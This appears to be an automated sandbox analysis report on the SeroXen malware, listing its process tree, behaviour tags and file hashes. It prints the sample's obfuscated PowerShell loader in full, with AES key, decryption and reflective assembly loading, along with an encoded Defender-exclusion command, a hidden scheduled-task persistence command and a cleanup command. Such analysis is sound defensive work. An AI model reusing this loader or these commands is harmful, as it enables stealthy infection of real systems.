C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_215.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\SeroXen.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAZgBtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAaQBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAegBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZABuACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\Uni.bat" "3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Windows\Uni.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_199_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.vbs"5⤵
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.bat" "6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OYi6jovj9grd+OhQ3Yq9CKyYEolqR3DCnwhMoiMIiic='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x758XCMTdc4jhHfAjXEAbQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $PTonT=New-Object System.IO.MemoryStream(,$param_var); $pteGk=New-Object System.IO.MemoryStream; $QeYIq=New-Object System.IO.Compression.GZipStream($PTonT, [IO.Compression.CompressionMode]::Decompress); $QeYIq.CopyTo($pteGk); $QeYIq.Dispose(); $PTonT.Dispose(); $pteGk.Dispose(); $pteGk.ToArray();}function execute_function($param_var,$param2_var){ $imxQj=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oCBDZ=$imxQj.EntryPoint; $oCBDZ.Invoke($null, $param2_var);}$bxwFd = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_199.bat';$host.UI.RawUI.WindowTitle = $bxwFd;$spiDd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bxwFd).Split([Environment]::NewLine);foreach ($urTOm in $spiDd) { if ($urTOm.StartsWith('VUGwKkMvYCOpuHkPGxtm')) { $jdwUC=$urTOm.Substring(20); break; }}$payloads_var=[string[]]$jdwUC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden7⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"C:\Users\Admin\AppData\Local\Temp\SeroXen.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 127.0.0.1 -n 4 > nul & taskill /F /IM "SeroXen.exe" & taskill /F /IM "SeroXen HWID Reset.exe" & taskill /F /IM "SeroXen Toolkit.exe" & rmdir /s /q %userprofile%\AppData\Local\SeroXen & rmdir /s /q %userprofile%\AppData\Local\SeroXen & del /f %userprofile%\Desktop\SeroXen.lnk & taskkill /F /IM "SeroXen.exe" & taskkill /F /IM "SeroXen HWID Reset.exe" & taskkill /F /IM "SeroXen Toolkit.exe" & rmdir /s /q "C:\Users\Admin\AppData\Local\Temp" & rmdir /s /q "C:\Users\Admin\AppData\Local\Temp" & exit4⤵
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 45⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "SeroXen.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "SeroXen HWID Reset.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "SeroXen Toolkit.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\SeroXen\README.txt2⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4028,i,13281073920029625837,8253721632651544158,262144 --variations-seed-version --mojo-platform-channel-handle=4424 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\7-Zip\7-zip.dllFilesize
99KB
MD58af282b10fd825dc83d827c1d8d23b53
SHA117c08d9ad0fb1537c7e6cb125ec0acbc72f2b355
SHA2561c0012c9785c3283556ac33a70f77a1bc6914d79218a5c4903b1c174aaa558ca
SHA512cb6811df9597796302d33c5c138b576651a1e1f660717dd79602db669692c18844b87c68f2126d5f56ff584eee3c8710206265465583de9ec9da42a6ed2477f8
-
C:\Program Files\7-Zip\7z.dllFilesize
1.8MB
MD50009bd5e13766d11a23289734b383cbe
SHA1913784502be52ce33078d75b97a1c1396414cf44
SHA2563691adcefc6da67eedd02a1b1fc7a21894afd83ecf1b6216d303ed55a5f8d129
SHA512d92cd55fcef5b15975c741f645f9c3cc53ae7cd5dffd5d5745adecf098b9957e8ed379e50f3d0855d54598e950b2dbf79094da70d94dfd7fc40bda7163a09b2b
-
C:\Program Files\7-Zip\7zG.exeFilesize
691KB
MD5ef0279a7884b9dd13a8a2b6e6f105419
SHA1755af3328261b37426bc495c6c64bba0c18870b2
SHA2560cee5cb3da5dc517d2283d0d5dae69e9be68f1d8d64eca65c81daef9b0b8c69b
SHA5129376a91b8fb3f03d5a777461b1644049eccac4d77b44334d3fe292debed16b4d40601ebe9accb29b386f37eb3ccc2415b92e5cc1735bcce600618734112d6d0e
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010Filesize
1.5MB
MD5f1320bd826092e99fcec85cc96a29791
SHA1c0fa3b83cf9f9ec5e584fbca4a0afa9a9faa13ed
SHA256ad12cec3a3957ff73a689e0d65a05b6328c80fd76336a1b1a6285335f8dab1ba
SHA512c6ba7770de0302dd90b04393a47dd7d80a0de26fab0bc11e147bf356e3e54ec69ba78e3df05f4f8718ba08ccaefbd6ea0409857973af3b6b57d271762685823a
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
264B
MD56e520c8ba02100acab47360d8b920d1d
SHA16bd1ce7c29566bb047c60a4a0aaff7fd1516b3c6
SHA256630e2924647c58c62e728181cd08f423129eb6294968a25648a872368c8940e0
SHA512ec04c6b62b871cf06d5087472c722bf1ec45184372fc06e9d12e3fdcaab648c4444192ca2cf54b20e9886f2401c3ce04ffd198f91599d41c81e2928d557365c2
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5b5bd254c3906a84949e080c00aafa886
SHA1adb2994d38ff5472714190cf44490bf9fd30cdf6
SHA25630d4792f225cc8c7a2bfa9f1f05b04c0269548e3ebc54d710928089727732dc0
SHA5128fdef654da38421679ebbf6b0078b7d679c436f7525c60c9250edd82d4ca6df48212000a1e22c2a28330da1010456de179db97082007ac6bb876dee1a90c9e08
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
2KB
MD5a5c9cb9c97c91ada25c4e4aa726a9309
SHA1439f7cc84881e0c839fec3fe445158cef4df0710
SHA25660b17330a6eca970e0733b72c4563276771e8d782b78bdf0b2a46744380860bb
SHA5122371e1c2f01b7b1e871f47c30e60616d1ff9427e085399ebbf2c64983b60dc73ea837f93880125965595d122c77ed7f5958f5687be91dde50e853e3c5222f779
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
356B
MD567f58a8ed071cef305cac9f0524a1c1d
SHA161a8c5f29dc3b861d6d34d5ef21010fc29f2a7c9
SHA256790b73a6f1bcf436801e80935ab19b935906fcdac1d24e9c45dfbab26fd10c36
SHA512d470676090be3661f441e33014b178a514c483dfd3730696785d71965681ef45b67bdd4f5b4749318635406af2cd8399af1b1949fb0e8350cf63a1fb5e498053
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
523B
MD5d97b68ce7248a52b79777d8d503c8483
SHA146d6760b6a5e839ef17d4014f958d0c787ca942f
SHA256e33264dc79d9c6425be89be67386e71797e257e3c12217c3447d705feb531eb9
SHA512e1b5bd6ea44c64219cd5c7cc155c3c0dfb938c66d09386168e3dba5f09efc7e3bcc2a3188b8781217171ff7a92a17dfec850d77cf127320b09f7de0792a409a5
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5f75185bdbbfacf17c713bf7d41136f8e
SHA175dcddcedff98fa9875f0a9bfc971ad3bbe94ad3
SHA25662adae56970cef8d208f8bd402707ddf17d1782633d251b227871110c1346692
SHA512d6890b7fe4e67179eb586965917246d4ebaeffdd56703c55f7ee7ab0c99a27638d302dc49e8b6e4cbe4c3b8554c71c342aa1ffba7df851a090c2051cef7cc643
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD58a540799dcf537f8cae19710f2d2ba92
SHA1dc9aae962acb7882199d57d43bcc65e54db27f15
SHA256e7124230fb300fa6bf743e07586121e1a03896c1efdec28223563127df608ee5
SHA5121ceb719f5b5aadf2047197fb6015cf588f408c2e85fb97f2c9648edf4b4df6e933096d1791e13ae6ac77197a368449ecd60bba6d5413fec69fc186d9b83c50de
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesFilesize
16KB
MD5cdf3edc6cd197bacd997bd69432627bc
SHA1b7742d8d24875f2d8c3753b905ed123bdc152307
SHA256311079d0fcc425f69548a8c6fed3eaffedc566b60e8aba30a8a20b39a0113ff5
SHA5123c5728504434d0a6978450689089eec9315dab5abe2ea5ddd67a127468f24f947e546331204e9629acd7167b5a6f1d344c9cafb08fe61a2990ad62a3fac7d0ab
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
269KB
MD552a7d97ab5aa38092d6a3969b43008c0
SHA153dcb347c47b7cd69dc6bc6ce0eb7cf6d8b6b2d6
SHA256b473721199faa6f09af9396256778dc6944358d0723425f54c8f85cd9d46b985
SHA51263a817180e84fb471e6e88a9fe4be2e94652fc7fd64c394bd21021ed70998f05c739c3e28adbab4135ad67a9506a5c94e93e764a5e270d3aaee9b6a7b1c9b8b1
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info CacheFilesize
101KB
MD5305029c72772bf6ac22c6122f951972a
SHA1a9c5d3a5a7c226f06352068d0774990e7d33772c
SHA2565cdde1a3f8fb5dc59f6dff7a51d3270b517f999d052b14be7326055c39266e4b
SHA5123f4ebf52499c3050e7476549f8adf3c6faa981021c0e69082bd5425021448651bad2f8abaf81e43fab37ea0909f94b2b94a9d0642cad9db167f094f0237ccd1f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58654d.TMPFilesize
89KB
MD5d551f2474f984f9d2980299e4881cf2c
SHA17c235c2bc8ba89bd9fa6dd440d5b092ae2c880e5
SHA256da296403018194107bf7001f1798d619d80c917900a8d23d3087c8250d86c180
SHA5127ee5b832a872dc2c42ad5274f2eee1fd1f16d478083d69ce45430673e6c2a23df7d60a825f180449556ea7c6e707c01f9a11b5538a2fed5597116bbca283f552
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SeroXen.exe.logFilesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
C:\Users\Admin\AppData\Local\Temp\SeroXen.exeFilesize
334KB
MD5e9a1163f07012ba9cf0eeaa4f4274cb0
SHA1e67f4264c87ddee54d19f84b2b27d97c65960f90
SHA256dfa59e4d9561680fcaa24cd8960f3bb2e0ffd26100c1209f51c1be0f2a500508
SHA512f65b344b3ba17aa64d43a281e8e28cceb4a571d60dee3fadb1be045e319805da4ab301a809770c5e52223b371306be87c6ad75964eeed2948b23043fc14c3310
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\SeroXen.exeFilesize
933KB
MD5a8df19d691e618c209f5c8e386deafcf
SHA1135ea4a1d3c7358f7bd6a51973c7be7ee52f0d36
SHA256821edf221e3b8fd8070cf04628e5f77507de5ecf9d1afea79375a22578b419c2
SHA51280c1989ed585c313c14b6a91847b0e8fd758b1ef3bc3550322e6b6cb561b1bd2cb461c9ceea98b3240628fe6f74c2760b2a8db5f3f81b058559a2aed57e53779
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\BouncyCastle.Crypto.dllFilesize
2.7MB
MD5845661718fc59d2ec1e59c804ea0a319
SHA10e280f4195b263b56d7bc2a8af06e66bc6fb6b84
SHA256068d21b18320762850a2ec079e43d24e41e8dc7b7d4d1e60b8b8a60161eee95d
SHA51213a23d645b09fa9debc2109417ea38fca9d2a8240ec8d2b9297bb5dfc3c7ed70aadf3d08c8b4980569fc14986262d5e48afe263bd2287eb5b0195c43f8b04b3d
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Cake.Core.dllFilesize
590KB
MD59c0d3ed2549d77758c8d0e730e4a2380
SHA14917b06f091836a4b46a70a0e230dae42a002d1c
SHA2565b4d014d493ce66208537a1394aba89190a93025bf71857c39d45f9c95685338
SHA51295ea708ff271be8e76e2fb9c27766a1a80647a865c6086cc1114a6e45cccd52d9f7dc46a631676869d3542abb4314ec9f334bcddec4259789f0e895b1daa606f
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Cake.Powershell.dllFilesize
84KB
MD5b1df3b508e23822ad00398c763699107
SHA1a4595f098c07efb6f3082f7d8ffaba108d09cf5c
SHA25612f075efa29c981553c80f506647c712d12757f551d382216f08e5d652eb8e6b
SHA512be0f27503f4c2bf97c5d077cec1955d5c5a3cb627c8554b6342efb6b9bbb7d620c49f0163290cee40522583543faa5fbe17a49c7411c4151a21487b91824e10d
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Gma.System.MouseKeyHook.dllFilesize
57KB
MD5a3408d8823fad55cc76859e1bfca7033
SHA152f44344b4c44a0d30f71ead80751242f0d6a5fb
SHA25618742c1399b62ed53fef75a2c63ba94b8adfbbe5e09b8c2d8fb426d2f9e0ade5
SHA512840bede9a2f062eb2111fb0b1225ffb9c112165b2b1c5b49d48fb0e5e055e7772f37990d9d72d6d43d8359a3af9c00f1f7a2bdc2314619850a5d9ddbd11bac7f
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Logic.NET.dllFilesize
472KB
MD5a78ca07fdfd93bcfdc37ca824ec58850
SHA1d9c5ef1261a74f87a06e0934535c9f6c436b91fb
SHA2568337d23ad9bcfd3fe1cb357d173a36307b16f2e8b65b2af7245746b6c23c7fb4
SHA512599e8357e03fce4d709452a6e2f0a8c4ff41eb477de92256b47a8b7599f86b153ce43d6c7b6c52a120ed6f708355e40f4b41802f0a9acfd85cdad897ab6c2040
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.CodeCoverage.Shim.dllFilesize
7KB
MD5f27e6a41d8b2aed44a4a3143a3e39ceb
SHA135337c506f859ac4c078bbea66334367a2ffd696
SHA256f3a346e1ba5250f06561a5e488f0378dd295a9c4ce1a5e3389c5bbb724421181
SHA512988b2f84d2f942e1dcb80fdb79fffd6f4212b82e961e20023beba4c3096df99f788b5887edc965bf54efa6884c7b43bbe60441acd38fd08039c1f503ff339eb4
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dllFilesize
124KB
MD5f5b0619323bd200045b6a54710fe1d2b
SHA14f598978d5768d00d541ccc2ba2d20c3185862ea
SHA256b4189ff9118c8daafdb59c3b851dec5e1cb099d3f93ed33dff818622fbad4134
SHA51296843c4bc24b57429421f7ddbbcb147b613ac9c5ae7ef1689ee5d22a75844ff98809da5f54c85f308cfb9dc399991a9cc086e7a9ad01c19b414c6dc344966b14
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dllFilesize
9KB
MD58bb527db67433b149bcc4b4e7f4f5115
SHA11cf1eb3ec9b8bd9aaa1b84320ab68549dca03ee8
SHA2565a496524dd381e1a98a0430024240a409fa62039e2db7bba692100fa59604e5a
SHA5120cc8dc74014f0eea614e9e088a80b9d009f303d4b8e073614d92593ca86e0c52dd5716090f7d1f1ecdeb9bf149d3d520e4549591fe4686cc4608f305a415d571
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dllFilesize
99KB
MD585392bce56ebfc0fa98053e387d9bc75
SHA18da051c274cbbcb385c1b118ac7084594b0b5042
SHA2562277d6eaa6fb3edc48c4c3b03aa024ecb89fb3e6ce1f23a348e77ea495e790cf
SHA512f9735e4772a7490e21c6851ea9af7f1c7d9283b4d4f3a6b41c64ce4cdfd88c71699c02a4bad6e585c34fc04a58544808350515ea4d71a9597ca5322f349ed0f5
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dllFilesize
25KB
MD52300250ee990b536eb9ec1401617213b
SHA129bf3b475506406ffa49814c300e209b7a4f1d11
SHA2560998ee28d8b43a5753f0a3af8d80bddaf414a3e03a8732981f4d719d67564fc2
SHA5121276f2a5941ac03315ee3d907ed2ead4e26c964b1567c08481e78c10e16d34c80d9349d4dd6cb8e72bc55f7b06e11d674ce62bd9fdd938219a656bf2015afb86
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Microsoft.VisualStudio.TestPlatform.TestFramework.dllFilesize
58KB
MD5ae48ee9e36c045d98904c0e48ab661b1
SHA14734a4894906aacc58d57bb7c828d3af98197004
SHA256f5bc913c7410f7f4f1b0db7f0ddc90cac5858e4076d642744416830f7c2a4a6b
SHA512c98cb6ab212ebc1f82fe2d76e6c0838657f7b864b2c500d2952b9161744a83c69616df11c62f248345e4968ea767884684dc3f7e870be3712a58716eed27ac80
-
C:\Users\Admin\AppData\Local\Temp\SeroXen\bin\Mono.Cecil.Mdb.dllFilesize
191KB
MD5816bd7caee4eb82de66a3500aecdbcd4
SHA18c58f70335c60e5dc2ff27bea9568ab4886bc30b
SHA256bad4bd80811674ecb8a9247c15775cbb40df527441a0cdfd35d0b18ba3c93587
